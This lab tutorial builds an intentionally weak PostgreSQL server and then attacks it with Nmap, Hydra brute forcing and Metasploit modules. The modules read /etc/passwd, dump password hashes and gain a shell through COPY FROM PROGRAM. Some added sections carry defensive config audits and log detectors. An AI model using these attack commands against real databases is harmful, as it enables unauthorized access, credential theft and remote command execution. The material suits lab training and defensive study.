In this post, we will demonstrate how to set up our own vulnerable PostgreSQL server for penetration testing on Ubuntu 20.04, and how to conduct PostgreSQL penetration testing against it.
Table of Contents
Pre-requisites
PostgreSQL Setup on Ubuntu 20.04
PostgreSQL Penetration Testing
Scanning: Nmap
Brute force: Hydra
Access Postgres Shell
Exploiting: Metasploit
· Module 1: Postgres Readfile
· Module 2: Banner Grabbing for Postgres_sql
· Module 3: Dumping Password Hashes
· Module 4: Pwn Postgres Shell
Pre-requisites:
Target: Ubuntu
Attacker: Kali Linux
PostgreSQL Setup on Ubuntu 20.04
PostgreSQL is an open-source, advanced object-relational database, also known as Postgres. It is a powerful, high-performance database management system released under a flexible BSD-style license.
In order to configure PostgreSQL on your Ubuntu platform, there are some prerequisites required for installation.
§ Ubuntu 20.04
§ Root Privileges
Install PostgreSQL and All Dependencies
PostgreSQL is available in the Ubuntu repository, so you just need to install it with the apt command.
apt install postgresql postgresql-client
During installation, a prompt will ask you to confirm whether you want to continue. Press ‘y’ to continue the installation.
Once the installation is complete, start the PostgreSQL service and add it to the system boot by entering the following commands:
systemctl start postgresql.service
systemctl enable postgresql.service
Set PostgreSQL user password
You can set a password for the postgres system user with the following command. During this process a prompt will ask you to enter the new password; afterwards the confirmation ‘password updated successfully’ is displayed. Next, log in as the postgres user and open the database shell using the following commands:
passwd postgres
su -l postgres
psql
Create a database and user roles
You can create new databases and user roles with the PostgreSQL client utilities (run as the postgres user) as follows:
psql -c "alter user postgres with password '123'"
createuser -EPd ignite
createdb secret -O ignite
psql secret
Enter the following command to list the databases:
psql -l
PostgreSQL by default listens only on the local interface, 127.0.0.1. For remote access you need to make some changes in the configuration file. To open the configuration file, use the following command:
nano /etc/postgresql/12/main/postgresql.conf
Under the connection settings, set listen_addresses = '*' (the line ships commented out with a leading #; remove the # so the setting takes effect).
Now restart the PostgreSQL service by entering the following command:
service postgresql restart
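A configuration check to go with this step, added here as an example and not part of the original post: the shell functions below read a postgresql.conf and a pg_hba.conf and report the settings that make an instance reachable and guessable from the network, including password_encryption, which decides what a dump of the stored hashes is worth to an attacker. Even with listen_addresses = '*', pg_hba.conf decides which clients may authenticate (the Ubuntu package only allows loopback by default), so a lab that accepts remote logins needs a host rule there as well. The file paths, the sample files and the function names are all assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the original post: audit the two PostgreSQL
# configuration files for the settings that turn a lab box into a
# network-reachable target. Usage against a real 12.x install on Ubuntu:
#   listen_exposure  /etc/postgresql/12/main/postgresql.conf
#   password_hashing /etc/postgresql/12/main/postgresql.conf
#   audit_pg_hba     /etc/postgresql/12/main/pg_hba.conf
# The sample files written below are constructed for the demonstration.

# conf_value FILE KEY: print the effective (last, uncommented) value of KEY
# from a postgresql.conf, with surrounding quotes and whitespace removed.
# Prints nothing when the key only appears as a commented-out default.
conf_value() {
    sed -n \
        -e 's/#.*$//' \
        -e 's/[[:space:]]*$//' \
        -e "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*'\{0,1\}\([^']*\)'\{0,1\}$/\1/p" \
        "$1" | tail -n 1
}

# listen_exposure CONF: "exposed" when listen_addresses binds every interface,
# "local-only" when unset or loopback, "restricted" for an explicit address list.
listen_exposure() {
    case "$(conf_value "$1" listen_addresses)" in
        ''|localhost|127.0.0.1) echo local-only ;;
        *\**|*0.0.0.0*)         echo exposed ;;
        *)                      echo restricted ;;
    esac
}

# password_hashing CONF: how role passwords are stored. md5 hashes are cheap to
# crack offline once dumped; scram-sha-256 is the stronger choice. Prints
# "unset" when the server default applies.
password_hashing() {
    v=$(conf_value "$1" password_encryption)
    [ -n "$v" ] && echo "$v" || echo unset
}

# audit_pg_hba HBA: one finding per rule that accepts connections from any
# address, or that uses the "trust" method (no password at all). The address
# column is parsed in CIDR form only; the separate-netmask form is not handled.
audit_pg_hba() {
    awk '
        /^[[:space:]]*#/ || NF == 0 { next }                      # comments, blank lines
        $1 == "local" && $4 == "trust" { print "trust-auth: " $0; next }
        $1 ~ /^host(ssl|nossl)?$/ {
            addr = $4; method = $5
            if (method == "trust") { print "trust-auth: " $0; next }
            if ((addr == "0.0.0.0/0" || addr == "::/0" || addr == "all") && method != "cert")
                print "any-host: " $0
        }' "$1"
}

SAMPLE_DIR=$(mktemp -d)
SAMPLE_CONF="$SAMPLE_DIR/postgresql.conf"
SAMPLE_HBA="$SAMPLE_DIR/pg_hba.conf"

# Constructed postgresql.conf fragment: the packaged commented default is kept
# and the post's edit is applied on the line after it.
cat > "$SAMPLE_CONF" <<'EOF'
# - Connection Settings -
#listen_addresses = 'localhost'         # what IP address(es) to listen on;
listen_addresses = '*'
port = 5432                             # (change requires restart)
password_encryption = md5               # md5 or scram-sha-256
EOF

# Constructed pg_hba.conf: two weak rules added to the Ubuntu defaults.
cat > "$SAMPLE_HBA" <<'EOF'
# TYPE  DATABASE        USER            ADDRESS                 METHOD
local   all             postgres                                peer
local   all             all                                     peer
host    all             all             127.0.0.1/32            md5
host    all             all             ::1/128                 md5
host    all             all             0.0.0.0/0               md5
host    secret          ignite          192.168.1.0/24          trust
EOF

echo "listen_addresses:    $(listen_exposure "$SAMPLE_CONF")"
echo "password_encryption: $(password_hashing "$SAMPLE_CONF")"
audit_pg_hba "$SAMPLE_HBA"
```

On the sample files this reports the instance as exposed, md5 password storage, and the two pg_hba rules (the any-host md5 rule and the trust rule for the secret database) that an attacker on the lab network would benefit from.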
Let’s start Pentesting PostgreSQL
In this section, you will learn how to compromise database credentials using different techniques.
Let’s fire up the attacking machine, Kali Linux.
Nmap
By default the PostgreSQL service runs on port 5432; with the help of Nmap, let’s identify the state of that port.
nmap -p5432 192.168.1.108
As you can see, it shows port 5432 in the open state, running the postgresql service.
Hydra – A Brute Forcing Tool
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
Let’s brute-force the target. To perform this attack, use the following command, where the -L option supplies a dictionary for the username parameter and the -P option supplies a dictionary for the password list.
hydra -L user.txt -P pass.txt 192.168.1.108 postgres
As you can see above, we have successfully dumped the credentials; you can use these credentials to gain access to the database.
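The other side of the Hydra run is what it leaves in the server log. The added example below (not from the original post) parses PostgreSQL's log for the burst of failed authentications a dictionary attack produces and reports when the same client then logs in successfully. It assumes log_line_prefix = '%m [%p] %h %u@%d ' so that the client address is recorded (the Ubuntu default prefix omits %h) and log_connections = on for the 'connection authorized' line; the log lines are constructed and the function name is the example's own.

```shell
#!/bin/sh
# Added example, not part of the original post: spot a Hydra-style password
# spray in the PostgreSQL server log and tell whether it ended in a successful
# login. Assumes log_line_prefix = '%m [%p] %h %u@%d ' so that the client
# address (%h) is the fifth whitespace-separated field, and log_connections = on.
# Real usage:
#   detect_bruteforce /var/log/postgresql/postgresql-12-main.log 10
# The log lines written below are constructed for the demonstration.

# detect_bruteforce LOGFILE THRESHOLD
# Prints "CREDENTIAL-GUESSED host=H user=U" when a host with at least THRESHOLD
# failed password attempts is later authorized, and one "BRUTE-FORCE" summary
# line per offending host (failure count and number of distinct user names tried).
detect_bruteforce() {
    awk -v thr="$2" '
        / FATAL:  password authentication failed for user / {
            host = $5
            fails[host]++
            user = $NF; gsub(/"/, "", user)            # last token is the quoted user name
            if (!((host, user) in seen)) { seen[host, user] = 1; nusers[host]++ }
            next
        }
        / LOG:  connection authorized: user=/ {
            host = $5
            if (fails[host] >= thr) {
                for (i = 1; i <= NF; i++) if ($i ~ /^user=/) user = substr($i, 6)
                print "CREDENTIAL-GUESSED host=" host " user=" user
            }
        }
        END {
            for (host in fails)
                if (fails[host] >= thr)
                    print "BRUTE-FORCE host=" host " failures=" fails[host] " users=" nusers[host]
        }' "$1"
}

# Constructed log: seven rapid failures from 192.168.1.111 across three user
# names followed by a success, and one ordinary typo from 192.168.1.50.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
2024-05-01 10:00:01.101 UTC [2301] 192.168.1.111 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.102 UTC [2302] 192.168.1.111 admin@postgres FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:01.103 UTC [2303] 192.168.1.111 ignite@postgres FATAL:  password authentication failed for user "ignite"
2024-05-01 10:00:01.104 UTC [2304] 192.168.1.111 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.105 UTC [2305] 192.168.1.111 admin@postgres FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:01.106 UTC [2306] 192.168.1.111 ignite@postgres FATAL:  password authentication failed for user "ignite"
2024-05-01 10:00:01.107 UTC [2307] 192.168.1.111 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.108 UTC [2308] 192.168.1.111 postgres@postgres LOG:  connection authorized: user=postgres database=postgres
2024-05-01 10:00:05.000 UTC [2309] 192.168.1.50 ignite@secret FATAL:  password authentication failed for user "ignite"
2024-05-01 10:00:07.000 UTC [2310] 192.168.1.50 ignite@secret LOG:  connection authorized: user=ignite database=secret
EOF

detect_bruteforce "$SAMPLE_LOG" 5
```

With a threshold of 5 the attacking host is reported with 7 failures over 3 user names and a CREDENTIAL-GUESSED line for the postgres account, while the single failure from 192.168.1.50 stays below the threshold. The timestamps in a real log also give the rate, which is the better signal when a tool runs with many parallel tasks.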
Connect to Database Remotely
Kali Linux has the psql utility by default, which allows you to authenticate to a PostgreSQL database if the username and password are already known. As we already have the right credentials for the database:
psql -h 192.168.1.108 -U postgres
Metasploit
As we know, Metasploit comes preinstalled with Kali Linux, so our first step is to get to the Metasploit console.
Module 1: Postgres Readfile
The postgres_readfile module, when provided with credentials (e.g. a superuser account) for a PostgreSQL server, will read and display files of your choosing on the server.
msf > use auxiliary/admin/postgres/postgres_readfile
msf auxiliary(admin/postgres/postgres_readfile) > set rhosts 192.168.1.108
msf auxiliary(admin/postgres/postgres_readfile) > set rfile /etc/passwd
msf auxiliary(admin/postgres/postgres_readfile) > set password 123
msf auxiliary(admin/postgres/postgres_readfile) > exploit
Module 2: Banner Grabbing for Postgres_sql
The postgres_sql module, when provided with valid credentials for a PostgreSQL server, will perform queries of your choosing and return the results.
msf > use auxiliary/admin/postgres/postgres_sql
msf auxiliary(admin/postgres/postgres_sql) > set rhosts 192.168.1.108
msf auxiliary(admin/postgres/postgres_sql) > set username ignite
msf auxiliary(admin/postgres/postgres_sql) > set password 123
msf auxiliary(admin/postgres/postgres_sql) > exploit
Module 3: Dumping Password Hashes
As we have the credentials of the database admin, we use this module to dump all the user hashes in Metasploit:
msf > use auxiliary/scanner/postgres/postgres_hashdump
msf auxiliary(scanner/postgres/postgres_hashdump) > set rhosts 192.168.1.108
msf auxiliary(scanner/postgres/postgres_hashdump) > set username postgres
msf auxiliary(scanner/postgres/postgres_hashdump) > set password 123
msf auxiliary(scanner/postgres/postgres_hashdump) > exploit
Module 4: Pwn Postgres Shell
Installations running Postgres 9.3 and above have functionality which allows the superuser, and users with 'pg_execute_server_program', to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table.
msf > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 192.168.1.108
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set lhost 192.168.1.111
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username postgres
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password 123
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
Now we have gained access to the database. You can observe that here we obtain a command session, which we later upgrade into a Meterpreter session.
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -u 1
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions 2
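A detection to pair with this module, added as an example that is not part of the original post: the function below scans the server log for statements that use COPY with PROGRAM (command execution as the postgres OS user) or with a server-side file path, the superuser-only features that the module described above depends on. It assumes log_statement = 'mod' or 'all' (so COPY FROM is logged), log_line_prefix = '%m [%p] %h %u@%d ', and single-line statements; the log lines, the table name and the function name are the example's own.

```shell
#!/bin/sh
# Added example, not part of the original post: find statements in the
# PostgreSQL server log that reach outside the database, i.e.
# COPY ... FROM/TO PROGRAM (runs a command as the postgres OS user) and
# COPY ... FROM/TO '<file>' (server-side file access). Both need superuser or
# one of the pg_execute_server_program / pg_read_server_files /
# pg_write_server_files roles, so legitimate use is rare and worth an alert.
# Assumes log_statement = 'mod' or 'all', log_line_prefix = '%m [%p] %h %u@%d '
# and single-line statements (multi-line statements continue on indented lines,
# which this example does not join). Real usage:
#   copy_program_events /var/log/postgresql/postgresql-12-main.log
# The log lines written below are constructed for the demonstration.

# copy_program_events LOGFILE: one line per finding, in the form
#   program-exec|server-file <date> <time> host=<addr> session=<user@db> stmt=<statement>
copy_program_events() {
    awk -v q="'" '
        / LOG:  statement: / {
            stmt = $0; sub(/.* LOG:  statement: /, "", stmt)
            up = toupper(stmt)                          # match regardless of keyword case
            kind = ""
            if (up ~ /^[[:space:]]*COPY .* (FROM|TO) PROGRAM /)       kind = "program-exec"
            else if (up ~ ("^[[:space:]]*COPY .* (FROM|TO) " q))       kind = "server-file"
            if (kind != "")
                print kind " " $1 " " $2 " host=" $5 " session=" $6 " stmt=" stmt
        }' "$1"
}

# Constructed log: one session creating a table and filling it from a program,
# an ordinary application session (COPY FROM STDIN is client-side and benign),
# and a loopback session reading a server file.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
2024-05-01 10:05:00.000 UTC [2400] 192.168.1.111 postgres@postgres LOG:  statement: CREATE TABLE lab_out(line text)
2024-05-01 10:05:00.200 UTC [2400] 192.168.1.111 postgres@postgres LOG:  statement: COPY lab_out FROM PROGRAM 'hostname'
2024-05-01 10:05:00.400 UTC [2400] 192.168.1.111 postgres@postgres LOG:  statement: SELECT * FROM lab_out
2024-05-01 10:05:01.000 UTC [2401] 192.168.1.50 ignite@secret LOG:  statement: SELECT count(*) FROM customers
2024-05-01 10:05:01.500 UTC [2401] 192.168.1.50 ignite@secret LOG:  statement: COPY customers FROM STDIN
2024-05-01 10:05:02.000 UTC [2402] 127.0.0.1 postgres@postgres LOG:  statement: copy lab_out from '/etc/passwd'
EOF

copy_program_events "$SAMPLE_LOG"
```

On the sample the program-exec line from 192.168.1.111 and the server-file line from loopback are reported; the STDIN copy is not. Because these statements require superuser or membership in the server-program and server-file roles, the matching hardening step is to keep application roles out of those roles, which removes the module's precondition even when a password has been guessed.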
Now we have full access to the database. In this way we can test for Postgres loopholes and submit the findings to the network admin 😊.